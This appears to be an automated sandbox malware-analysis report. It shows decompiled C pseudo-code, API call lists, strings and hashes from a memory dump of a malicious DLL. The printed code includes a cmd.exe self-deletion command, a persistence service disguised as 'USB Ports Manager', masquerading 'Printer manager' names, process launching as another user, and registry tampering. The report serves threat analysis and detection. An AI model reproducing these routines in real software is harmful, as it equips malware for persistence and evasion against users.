				E6ECA2DF0("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", ".pdll");
				_t41 =  &(_t40[4]);
				Sleep(0xfa0);
				_t37 = HeapAlloc(GetProcessHeap(), 8, 0x400);
				if(_t37 != 0) {
					_v268 = GetTickCount();
					_t19 = RtlRandom( &_v268);
					wsprintfA(_t37, "/c ren \"%s*.*\" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q \"%s*.*\"", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", _t19, 0xa, "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
					_push(0);
					_push(0);
					_push(0);
					E6ECA4230(0, "cmd.exe", _t37);
					_t41 =  &(_t41[0xc]);
					HeapFree(GetProcessHeap(), 0, _t37);
				}
				_t28 = M6ECB057C; // 0x0
				wsprintfA( &_v264, "%s%s%c", "Global\\", _t28, 0x4b);
				_t14 = OpenEventA(2, 0,  &_v256);
				_t38 = _t14;
				if(_t38 != 0) {
					SetEvent(_t38);
					return CloseHandle(_t38);
				}
				return _t14;
			}

0x6eca52b0
0x6eca52be
0x6eca52c5
0x6eca52cb
0x6eca52cb
0x6eca52d0
0x6eca52d7
0x6eca52e6
0x6eca52ec
0x6eca52ee
0x6eca52fa
0x6eca52ff
0x6eca52ff
0x6eca5302
0x6eca5303
0x6eca5304
0x6eca5306
0x6eca5308
0x6eca5319
0x6eca531e
0x6eca5326
0x6eca5348
0x6eca534c
0x6eca5354
0x6eca535d
0x6eca5374
0x6eca5376
0x6eca5378
0x6eca537a
0x6eca5384
0x6eca5389
0x6eca5392
0x6eca5392
0x6eca5398
0x6eca53b0
0x6eca53be
0x6eca53c4
0x6eca53ca
0x6eca53cd
0x00000000
0x6eca53d4
0x6eca53e1

APIs

Sleep.KERNEL32(00000FA0), ref: 6ECA5326
GetProcessHeap.KERNEL32(00000008,00000400), ref: 6ECA5339
HeapAlloc.KERNEL32(00000000), ref: 6ECA533C
GetTickCount.KERNEL32 ref: 6ECA534E
RtlRandom.NTDLL(?), ref: 6ECA535D
wsprintfA.USER32 ref: 6ECA5374
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA538F
HeapFree.KERNEL32(00000000), ref: 6ECA5392
wsprintfA.USER32 ref: 6ECA53B0
OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA53BE
SetEvent.KERNEL32(00000000), ref: 6ECA53CD
CloseHandle.KERNEL32(00000000), ref: 6ECA53D4

Strings

cmd.exe, xrefs: 6ECA537D
Global\, xrefs: 6ECA53A1
%s%s%c, xrefs: 6ECA53AA
.pdll, xrefs: 6ECA5313
Printer manager, xrefs: 6ECA52EE
/c ren "%s*.*" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q "%s*.*", xrefs: 6ECA536E
UniPrint Manager, xrefs: 6ECA52F3

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$EventProcesswsprintf$AllocCloseCountFreeHandleOpenRandomSleepTick
String ID: %s%s%c$.pdll$/c ren "%s*.*" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q "%s*.*"$Global\$Printer manager$UniPrint Manager$cmd.exe
API String ID: 1614445722-1432403852
Opcode ID: 43e966bb3547ea9a23ecbd3629fe2537e07860e2ee82f4c375b95ebbd5bcfbde
Instruction ID: 871b8f119d8be8dae27d60de658c2a4e4f9830c2c9b5ca11ccc08e912b5101c3
Opcode Fuzzy Hash: 43e966bb3547ea9a23ecbd3629fe2537e07860e2ee82f4c375b95ebbd5bcfbde
Instruction Fuzzy Hash: 0C31D6B1941B12BBE62097D88E4AF9F3B79EB86B18F014504FF1557284F7B0A8048FA5

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA1100, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E6ECA1100(intOrPtr _a4, intOrPtr _a8) {
				short _v512;
				short _v520;
				short _v1036;
				short _v1040;
				short _v1044;
				short _v1048;
				short _v1052;
				intOrPtr _t24;
				WCHAR* _t39;
				void* _t41;
				intOrPtr _t65;
				void* _t67;
				void* _t73;
				void* _t75;
				long* _t77;

				_t24 = _a4;
				 *_t77 = 0;
				if(_t24 != 2) {
					if(_t24 != 3) {
						goto L16;
					} else {
						CloseHandle( *(_a8 + 0x14));
						return 1;
					}
				} else {
					_t71 = _a8;
					_v1052 =  *(_a8 + 0x10);
					_t75 = E6ECAA360( *((intOrPtr*)( *(_a8 + 0x10) + 4)), 0, 0);
					_t77 =  &(_t77[3]);
					if(_t75 != 0) {
						_t73 = E6ECAA360( *((intOrPtr*)(_t71 + 4)), ( *(_t71 + 0x1c) & 0x0000ffff) >> 0x00000007 & 0x00000001, 0);
						_t77 =  &(_t77[3]);
						if(_t73 != 0) {
							wsprintfW( &_v1048, L"\\\\.\\%s%s", _t75, _t73);
							_t77 =  &(_t77[4]);
							PathRemoveFileSpecW( &_v1040);
							PathAddBackslashW( &_v1040);
							_t39 =  &_v1040;
							__imp__SHCreateDirectoryExW(0, _t39, 0, _t67);
							if(_t39 == 0 || _t39 == 0x50 || _t39 == 0xb7) {
								wsprintfW( &_v1052, L"\\\\.\\%s%s", _t75, _t73);
								_t77 =  &(_t77[4]);
								_t41 = CreateFileW( &_v1044, 0xc0000000, 0, 0, 4, 0x80, 0);
								if(_t41 != 0xffffffff) {
									L11:
									_v1052 = _t41;
								} else {
									if( *_v1048 != 0 && GetFileAttributesW( &_v1044) != 0xffffffff) {
										_t65 =  *0x6ecb0270; // 0x0
										wsprintfW( &_v520, L"%s%c%lu%s",  &_v1044, 0x2e, _t65, L".bak");
										_t77 =  &(_t77[6]);
										if(MoveFileExW( &_v1036,  &_v512, 0) != 0) {
											_t41 = CreateFileW( &_v1036, 0xc0000000, 0, 0, 4, 0x80, 0);
											if(_t41 != 0xffffffff) {
												goto L11;
											}
										}
									}
								}
							}
							HeapFree(GetProcessHeap(), 0, _t73);
						}
						HeapFree(GetProcessHeap(), 0, _t75);
					}
					L16:
					return  *_t77;
				}
			}

0x6eca1106
0x6eca110d
0x6eca1117
0x6eca129b
0x00000000
0x6eca129d
0x6eca12a8
0x6eca12b9
0x6eca12b9
0x6eca111d
0x6eca111f
0x6eca112b
0x6eca113a
0x6eca113c
0x6eca1141
0x6eca115d
0x6eca115f
0x6eca1164
0x6eca117d
0x6eca117f
0x6eca1187
0x6eca1192
0x6eca119a
0x6eca11a1
0x6eca11a9
0x6eca11c8
0x6eca11d0
0x6eca11ea
0x6eca11ef
0x6eca1266
0x6eca1266
0x6eca11f1
0x6eca11f8
0x6eca120a
0x6eca122a
0x6eca122c
0x6eca1246
0x6eca125f
0x6eca1264
0x00000000
0x00000000
0x6eca1264
0x6eca1246
0x6eca11f8
0x6eca126a
0x6eca1275
0x6eca127b
0x6eca1286
0x6eca1286
0x6eca128e
0x6eca1297
0x6eca1297

APIs

CloseHandle.KERNEL32(?), ref: 6ECA12A8

Part of subcall function 6ECAA360: MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,76D26900,6ECA39D7,?,00000000,00000000), ref: 6ECAA37F
Part of subcall function 6ECAA360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6ECAA392
Part of subcall function 6ECAA360: HeapAlloc.KERNEL32(00000000), ref: 6ECAA399
Part of subcall function 6ECAA360: MultiByteToWideChar.KERNEL32(6ECA39D7,00000000,00000000,000000FF,00000000,00000000), ref: 6ECAA3A9

wsprintfW.USER32 ref: 6ECA117D
PathRemoveFileSpecW.SHLWAPI(?), ref: 6ECA1187
PathAddBackslashW.SHLWAPI(?), ref: 6ECA1192
SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 6ECA11A1
wsprintfW.USER32 ref: 6ECA11C8
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6ECA11EA
GetFileAttributesW.KERNEL32(?), ref: 6ECA11FF
wsprintfW.USER32 ref: 6ECA122A
MoveFileExW.KERNEL32(?,?,00000000), ref: 6ECA123E
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6ECA125F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA126E
HeapFree.KERNEL32(00000000), ref: 6ECA1275
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA127F
HeapFree.KERNEL32(00000000), ref: 6ECA1286

Strings

%s%c%lu%s, xrefs: 6ECA1224
.bak, xrefs: 6ECA1210
\\.\%s%s, xrefs: 6ECA1177, 6ECA11C2

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$File$CreateProcesswsprintf$ByteCharFreeMultiPathWide$AllocAttributesBackslashCloseDirectoryHandleMoveRemoveSpec
String ID: %s%c%lu%s$.bak$\\.\%s%s
API String ID: 452034401-1383541090
Opcode ID: 155dca86c1cef4761c60092202460c18e4917c2a47c9285640b3692b4c8e6fc2
Instruction ID: 555547fb52a32462e05ff28968e5c989ea9b7a7bd55d82acf28e2188ba5197b8
Opcode Fuzzy Hash: 155dca86c1cef4761c60092202460c18e4917c2a47c9285640b3692b4c8e6fc2
Instruction Fuzzy Hash: A541B3B1244302ABD7209BACCD45F9B7BB9EB88715F004A08FB55D71C1E774E908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA7F10, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E6ECA7F10(void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct HWND__* _a20) {
				void* _t7;
				struct HWND__* _t8;
				struct HWND__* _t11;
				void* _t16;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				struct HINSTANCE__* _t40;
				struct HWND__* _t41;
				void* _t45;
				void* _t46;
				void* _t47;

				_t45 = __ebp;
				_t29 = _a8;
				if(_t29 == 0x275b || _t29 == 0x2755 || _t29 == 0x2ae1) {
					__eflags = 0;
					return 0;
				} else {
					_t40 = _a4;
					_t7 = E6ECA4E50(_t40, _t29);
					_t47 = _t46 + 8;
					_t35 = _t7;
					_t8 = _a20;
					_push(_t8);
					_push(_a16);
					_push(_a12);
					if(_t35 == 0) {
						_push(_t29);
						_push(_t40);
						M6ECB05E8();
						_t41 = _t8;
					} else {
						_t41 = CreateDialogIndirectParamW(_t40, _t35, ??, ??, ??);
						HeapFree(GetProcessHeap(), 0, _t35);
					}
					if(_t41 == 0) {
						L17:
						return _t41;
					} else {
						SetWindowTextA(_t41, 0x6ecad664);
						if(_t29 != 0x2872) {
							__eflags = _t29 - 0x2768;
							if(_t29 != 0x2768) {
								goto L17;
							} else {
								_t11 = GetDlgItem(_t41, 0x4e7d);
								_push(0);
								_push(0);
								__eflags = _t11;
								if(_t11 == 0) {
									PostMessageA(_t41, 0x10, ??, ??);
									goto L17;
								} else {
									PostMessageA(_t11, 0xf5, ??, ??);
									return _t41;
								}
							}
						} else {
							_t56 = M6ECB04B4;
							if(M6ECB04B4 != 0) {
								E6ECA52B0(_t45, 1);
								_t47 = _t47 + 4;
								ExitProcess(0);
							}
							_push(0);
							E6ECA28B0(".pdll");
							_t16 = M6ECB0534; // 0xcc2700
							_t31 = M6ECB0544; // 0x1
							_push(0);
							_push(L"Printer manager");
							M6ECB0540 = E6ECA4C30(_t31, _t16, L"UniPrint Manager");
							M6ECB050C = E6ECA3C60();
							E6ECA4CA0(_t56, 0);
							if(M6ECB04AC != 0) {
								_t33 = M6ECB0534; // 0xcc2700
								_push(0xffffffff);
								E6ECA3610(_t33);
								ExitProcess(0);
							}
							 *0x6ecb0398 = _t41;
							CallWindowProcW(E6ECA7790, _t41, 0x83fc, GetWindowLongW(_t41, 0xfffffffc), 0);
							SetWindowLongW(_t41, 0xfffffffc, E6ECA7790);
							return _t41;
						}
					}
				}
			}

0x6eca7f10
0x6eca7f11
0x6eca7f1b
0x6eca809e
0x6eca80a1
0x6eca7f39
0x6eca7f3a
0x6eca7f41
0x6eca7f4e
0x6eca7f51
0x6eca7f53
0x6eca7f57
0x6eca7f58
0x6eca7f59
0x6eca7f5c
0x6eca7f7a
0x6eca7f7b
0x6eca7f7c
0x6eca7f82
0x6eca7f5e
0x6eca7f69
0x6eca7f72
0x6eca7f72
0x6eca7f86
0x6eca8096
0x6eca809b
0x6eca7f8c
0x6eca7f92
0x6eca7f9e
0x6eca805d
0x6eca8063
0x00000000
0x6eca8065
0x6eca806b
0x6eca8071
0x6eca8073
0x6eca8075
0x6eca8077
0x6eca8090
0x00000000
0x6eca8079
0x6eca807f
0x6eca808a
0x6eca808a
0x6eca8077
0x6eca7fa4
0x6eca7fa4
0x6eca7fab
0x6eca7faf
0x6eca7fb4
0x6eca7fb9
0x6eca7fb9
0x6eca7fbf
0x6eca7fc6
0x6eca7fcb
0x6eca7fd0
0x6eca7fd6
0x6eca7fd8
0x6eca7fe9
0x6eca7ff5
0x6eca7ffa
0x6eca8009
0x6eca800b
0x6eca8011
0x6eca8014
0x6eca801e
0x6eca801e
0x6eca8029
0x6eca8041
0x6eca804f
0x6eca805a
0x6eca805a
0x6eca7f9e
0x6eca7f86

APIs

Part of subcall function 6ECA4E50: FindResourceW.KERNEL32(?,?,00000005), ref: 6ECA4E61
Part of subcall function 6ECA4E50: LoadResource.KERNEL32(?,00000000), ref: 6ECA4E70
Part of subcall function 6ECA4E50: SizeofResource.KERNEL32(?,00000000), ref: 6ECA4E7E
Part of subcall function 6ECA4E50: LockResource.KERNEL32(00000000), ref: 6ECA4E87
Part of subcall function 6ECA4E50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 6ECA4E96
Part of subcall function 6ECA4E50: HeapAlloc.KERNEL32(00000000), ref: 6ECA4E9D
Part of subcall function 6ECA4E50: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6ECA4EA8
Part of subcall function 6ECA4E50: FreeResource.KERNEL32(00000000), ref: 6ECA4ED7

CreateDialogIndirectParamW.USER32 ref: 6ECA7F60
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA7F6B
HeapFree.KERNEL32(00000000), ref: 6ECA7F72

Part of subcall function 6ECA28B0: RtlZeroMemory.NTDLL(00000140,00000140), ref: 6ECA28C2
Part of subcall function 6ECA28B0: RtlZeroMemory.NTDLL(?,00000208), ref: 6ECA28D4
Part of subcall function 6ECA28B0: wsprintfA.USER32 ref: 6ECA28F3
Part of subcall function 6ECA28B0: wsprintfA.USER32 ref: 6ECA2911
Part of subcall function 6ECA28B0: FindFirstFileA.KERNEL32(?,?), ref: 6ECA2923
Part of subcall function 6ECA28B0: lstrcmpA.KERNEL32(?,6ECAD538), ref: 6ECA2950
Part of subcall function 6ECA28B0: lstrcmpA.KERNEL32(?,6ECAD534), ref: 6ECA2960
Part of subcall function 6ECA28B0: lstrcatA.KERNEL32(?,?), ref: 6ECA2973
Part of subcall function 6ECA28B0: DeleteFileA.KERNEL32(?), ref: 6ECA298C
Part of subcall function 6ECA28B0: FindNextFileA.KERNEL32(00000000,?), ref: 6ECA29AD
Part of subcall function 6ECA28B0: FindClose.KERNEL32(00000000), ref: 6ECA29B8

Part of subcall function 6ECA3C60: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6ECA3C7E
Part of subcall function 6ECA3C60: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA3C8C
Part of subcall function 6ECA3C60: OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6ECA3CAA
Part of subcall function 6ECA3C60: wsprintfA.USER32 ref: 6ECA3CEF
Part of subcall function 6ECA3C60: CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6ECA3D1E
Part of subcall function 6ECA3C60: ChangeServiceConfig2A.ADVAPI32 ref: 6ECA3D74
Part of subcall function 6ECA3C60: wsprintfA.USER32 ref: 6ECA3D95

Part of subcall function 6ECA4CA0: wsprintfA.USER32 ref: 6ECA4CEC
Part of subcall function 6ECA4CA0: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6ECA4CF9
Part of subcall function 6ECA4CA0: HeapFree.KERNEL32(00000000), ref: 6ECA4CFC
Part of subcall function 6ECA4CA0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA4D1F
Part of subcall function 6ECA4CA0: RegDeleteValueA.ADVAPI32(?,00CB2CAC), ref: 6ECA4D42
Part of subcall function 6ECA4CA0: RegCloseKey.ADVAPI32(?), ref: 6ECA4E3C

SetWindowTextA.USER32(00000000,6ECAD664), ref: 6ECA7F92
ExitProcess.KERNEL32 ref: 6ECA7FB9
ExitProcess.KERNEL32 ref: 6ECA801E
GetWindowLongW.USER32 ref: 6ECA802F
CallWindowProcW.USER32(Function_00007790,00000000,000083FC,00000000), ref: 6ECA8041
SetWindowLongW.USER32 ref: 6ECA804F

Part of subcall function 6ECA3610: CreateEnvironmentBlock.USERENV ref: 6ECA3641
Part of subcall function 6ECA3610: RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA365B
Part of subcall function 6ECA3610: RtlZeroMemory.NTDLL ref: 6ECA3677
Part of subcall function 6ECA3610: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6ECA36A6
Part of subcall function 6ECA3610: Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6ECA36B1
Part of subcall function 6ECA3610: DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6ECA36E4
Part of subcall function 6ECA3610: CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6ECA36EA

Strings

.pdll, xrefs: 6ECA7FC1
Printer manager, xrefs: 6ECA7FD8
UniPrint Manager, xrefs: 6ECA7FDD

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess$CreateMemoryResourcewsprintf$FindWindowZero$CloseFileFreeOpenService$BlockDeleteEnvironmentExitLongManagerlstrcmp$AllocCallChangeConfig2DestroyDialogFirstHandleIndirectLoadLockMoveNextParamProcSizeofSleepTextUserValuelstrcat
String ID: .pdll$Printer manager$UniPrint Manager
API String ID: 2623091544-3698302044
Opcode ID: 210ebd118f70844dd7809d662236290ff8876c4c46ee09c03acd2e5e226fcf8e
Instruction ID: 1cd7f45f8d3a998998e82205b25e21a73cf7900f6c6550cf47939d07d21d7859
Opcode Fuzzy Hash: 210ebd118f70844dd7809d662236290ff8876c4c46ee09c03acd2e5e226fcf8e
Instruction Fuzzy Hash: 28312232605B12BBDA105BEC8E4DF9F7A78EB46719F104515FB25A72C4FB748800CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3930, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 102
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E6ECA3930(void* __ebx, void* _a4) {
				long _v4;
				long _v8;
				CHAR* _t22;
				long _t26;
				int _t33;
				void* _t34;
				void* _t47;
				signed int _t53;
				void* _t54;
				WCHAR* _t56;
				long* _t59;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t56 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
				if(_t56 == 0) {
					L18:
					HeapFree(GetProcessHeap(), 0, _a4);
					goto L19;
				}
				_v4 = 0;
				_t22 = GetCommandLineA();
				_v8 = 0;
				_t47 = E6ECAA3D0(_t22,  &_v8);
				_t59 =  &(( &_v8)[2]);
				if(_t47 == 0) {
					L17:
					HeapFree(GetProcessHeap(), 0, _t56);
					goto L18;
				}
				_t26 = _v8;
				if(_t26 <= 1) {
					L15:
					LocalFree(_t47);
					if(_v4 != 0) {
						_push( *_a4);
						E6ECA3610(_t56);
					}
					goto L17;
				} else {
					_t53 = 1;
					do {
						if(_t53 >= _t26 - 1) {
							goto L8;
						}
						if(lstrcmpiA( *(_t47 + _t53 * 4), "-svcr") == 0) {
							_t54 = E6ECAA360( *((intOrPtr*)(_t47 + 4 + _t53 * 4)), 0, 0);
							_t59 =  &(_t59[3]);
							if(_t54 != 0) {
								_v4 = 1;
								_t33 = PathIsRelativeW(_t54);
								_t34 = M6ECB0520; // 0xcbff88
								if(_t33 == 0) {
									_t34 = 0x6ecad664;
								}
								wsprintfW(_t56, L"\"%s%s\"", _t34, _t54);
								_t59 =  &(_t59[4]);
								HeapFree(GetProcessHeap(), 0, _t54);
							}
							L14:
							goto L15;
						}
						_t26 = _v8;
						L8:
						_t53 = _t53 + 1;
					} while (_t53 < _t26);
					goto L14;
				}
			}

0x6eca3938
0x6eca3a62
0x6eca3a67
0x6eca3a67
0x6eca3956
0x6eca395a
0x6eca3a50
0x6eca3a5a
0x00000000
0x6eca3a61
0x6eca3961
0x6eca3969
0x6eca3975
0x6eca3982
0x6eca3984
0x6eca3989
0x6eca3a3d
0x6eca3a49
0x00000000
0x6eca3a4f
0x6eca398f
0x6eca3996
0x6eca3a1f
0x6eca3a20
0x6eca3a2b
0x6eca3a33
0x6eca3a35
0x6eca3a3a
0x00000000
0x6eca399c
0x6eca39a3
0x6eca39a8
0x6eca39ad
0x00000000
0x00000000
0x6eca39bc
0x6eca39d7
0x6eca39d9
0x6eca39de
0x6eca39e1
0x6eca39e9
0x6eca39f1
0x6eca39f6
0x6eca39f8
0x6eca39f8
0x6eca3a05
0x6eca3a0b
0x6eca3a18
0x6eca3a18
0x6eca3a1e
0x00000000
0x6eca3a1e
0x6eca39be
0x6eca39c2
0x6eca39c2
0x6eca39c3
0x00000000
0x6eca39c7

APIs

GetProcessHeap.KERNEL32(00000008,0000020A), ref: 6ECA394D
HeapAlloc.KERNEL32(00000000), ref: 6ECA3950
GetCommandLineA.KERNEL32 ref: 6ECA3969

Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4

lstrcmpiA.KERNEL32(?,-svcr), ref: 6ECA39B8
PathIsRelativeW.SHLWAPI ref: 6ECA39E9
wsprintfW.USER32 ref: 6ECA3A05
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 6ECA3A11
HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 6ECA3A18
LocalFree.KERNEL32(00000000), ref: 6ECA3A20
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA3A46
HeapFree.KERNEL32(00000000), ref: 6ECA3A49
GetProcessHeap.KERNEL32(00000000,?), ref: 6ECA3A57
HeapFree.KERNEL32(00000000), ref: 6ECA3A5A

Strings

-svcr, xrefs: 6ECA39B2
"%s%s", xrefs: 6ECA39FF

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess$AllocLocal$CommandLinePathRelativelstrcmpilstrlenwsprintf
String ID: "%s%s"$-svcr
API String ID: 3712600073-2880469085
Opcode ID: 5900a73de5cd8ee1dda31ceff6865f7564c1b15669d19b5f78cadcd3c4a4b900
Instruction ID: ebfe330a7752bc3a5539a3b4f39b704f88108655d9f6f5903f22294a8fc4b1a3
Opcode Fuzzy Hash: 5900a73de5cd8ee1dda31ceff6865f7564c1b15669d19b5f78cadcd3c4a4b900
Instruction Fuzzy Hash: A2319A31504612ABD6509FECC95CF9EBBB8EB85319F004918FA1997244E7B4E844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4130, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA4130() {
				char _v248;
				char _v256;
				void* _v260;
				char _v264;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t18;
				void* _t37;
				void* _t38;

				_t11 = E6ECA3700("USBManager", 1);
				_t38 = _t37 + 8;
				if(_t11 == 0) {
					return _t11;
				}
				if(M6ECB0544 != 0) {
					_t18 =  *0x6ecb047c; // 0x0
					wsprintfA( &_v264, "%s\\%s%c%s", _t18, "svchost", 0, 0x6ecad543);
					_t38 = _t38 + 0x18;
					_v260 = 0;
					if(RegCreateKeyExA(0x80000002,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v260, 0) == 0) {
						RegDeleteValueA(_v260, "USBManager");
						RegCloseKey(_v260);
					}
				}
				_t12 =  *0x6ecb047c; // 0x0
